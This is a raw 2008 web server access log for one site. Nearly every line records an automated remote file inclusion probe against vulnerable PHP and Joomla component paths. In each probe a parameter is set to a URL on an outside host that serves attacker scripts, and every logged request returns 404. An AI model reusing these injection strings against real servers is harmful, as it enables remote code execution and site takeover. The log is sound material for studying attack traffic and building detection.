87.230.15.10 - - [25/Mar/2008:07:17:47 -0700] "GET /logs/access_071216.log/index.php?subpage=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:07:17:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:07:18:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:18:08 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:07:18:33 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:07:18:33 -0700] "GET /index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:07:18:34 -0700] "GET /logs/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:07:18:41 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:07:18:41 -0700] "GET /index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:07:18:41 -0700] "GET /logs/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:18:43 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:18:44 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:18:52 -0700] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:18:52 -0700] "GET //class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:18:52 -0700] "GET /logs//class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:07:19:05 -0700] "GET /logs/access_080128.log/index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:07:19:06 -0700] "GET /logs/index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:07:19:26 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.111 - - [25/Mar/2008:07:19:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.101 - - [25/Mar/2008:07:19:38 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:07:19:41 -0700] "GET /logs/access_080216.log/main.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:07:19:42 -0700] "GET /main.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:07:19:42 -0700] "GET /logs/main.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:07:19:59 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.9.201.67 - - [25/Mar/2008:07:20:05 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.201.67 - - [25/Mar/2008:07:20:06 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.201.67 - - [25/Mar/2008:07:20:07 -0700] "GET /logs/access_071227.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.201.67 - - [25/Mar/2008:07:20:07 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.201.67 - - [25/Mar/2008:07:20:07 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:20:20 -0700] "GET /logs/access_071227.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:20:20 -0700] "GET /logs/access_071227.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:20:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:20:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:20:21 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:20:21 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:07:20:45 -0700] "GET /logs/access_080306.log//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.146.225.109 - - [25/Mar/2008:07:21:29 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:07:21:50 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:07:21:51 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:07:22:07 -0700] "GET /logs//index.php?option=com_restaurante&task=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:07:22:07 -0700] "GET //index.php?option=com_restaurante&task=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:22:26 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:22:26 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:22:26 -0700] "GET /index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:22:27 -0700] "GET /logs/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:22:27 -0700] "GET /index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:22:28 -0700] "GET /logs/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:07:22:29 -0700] "GET /logs/access_080120.log/administrator/components/com_installer/admin.installer.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:07:22:29 -0700] "GET /administrator/components/com_installer/admin.installer.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:07:22:29 -0700] "GET /logs/administrator/components/com_installer/admin.installer.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:22:43 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:22:44 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:07:22:48 -0700] "GET /logs/access_080216.log/main.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:07:22:49 -0700] "GET /main.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [25/Mar/2008:07:22:49 -0700] "GET /logs/main.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:22:49 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:22:49 -0700] "GET /avatar.php?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:22:49 -0700] "GET /logs/avatar.php?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.9.201.67 - - [25/Mar/2008:07:22:59 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:23:00 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:23:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:23:00 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:07:23:03 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:07:23:03 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:07:23:04 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.9.201.67 - - [25/Mar/2008:07:23:08 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:07:23:32 -0700] "GET /logs/access_080215.log//ultrastats/include/functions_common.php?gl_root_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:07:23:32 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:07:23:32 -0700] "GET /logs//ultrastats/include/functions_common.php?gl_root_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.88.116.153 - - [25/Mar/2008:07:23:46 -0700] "GET /logs//index.php?option=com_restaurante&task=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
203.88.116.153 - - [25/Mar/2008:07:23:46 -0700] "GET //index.php?option=com_restaurante&task=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:23:48 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.104.39 - - [25/Mar/2008:07:23:50 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.98.78.98 - - [25/Mar/2008:07:23:56 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.98.78.98 - - [25/Mar/2008:07:23:56 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
116.125.113.115 - - [25/Mar/2008:07:24:03 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:24:04 -0700] "GET /logs/access.log//class/class.dashboard_lms.php?where_framework=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
116.125.113.115 - - [25/Mar/2008:07:24:04 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:07:25:42 -0700] "GET /logs/access_080225.log/start.php?pg=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:07:25:42 -0700] "GET /start.php?pg=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:07:25:42 -0700] "GET /logs/start.php?pg=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:25:58 -0700] "GET /index2.php?x=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:25:59 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:25:59 -0700] "GET /index2.php?x=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:25:59 -0700] "GET /logs/index2.php?x=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:26:49 -0700] "GET /logs/access_071212.log//spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:26:49 -0700] "GET //spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:26:49 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:27:06 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:27:06 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:27:25 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:07:27:25 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:07:27:25 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:07:27:26 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:07:27:32 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:27:47 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:27:52 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:28:07 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:28:07 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:28:08 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:28:09 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:28:10 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:28:10 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:07:28:37 -0700] "GET /logs/access_071226.log//classified_right.php?language_dir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:07:29:47 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:07:29:50 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:07:29:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:30:08 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:30:08 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:30:09 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:30:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:30:12 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:07:30:12 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:07:30:13 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
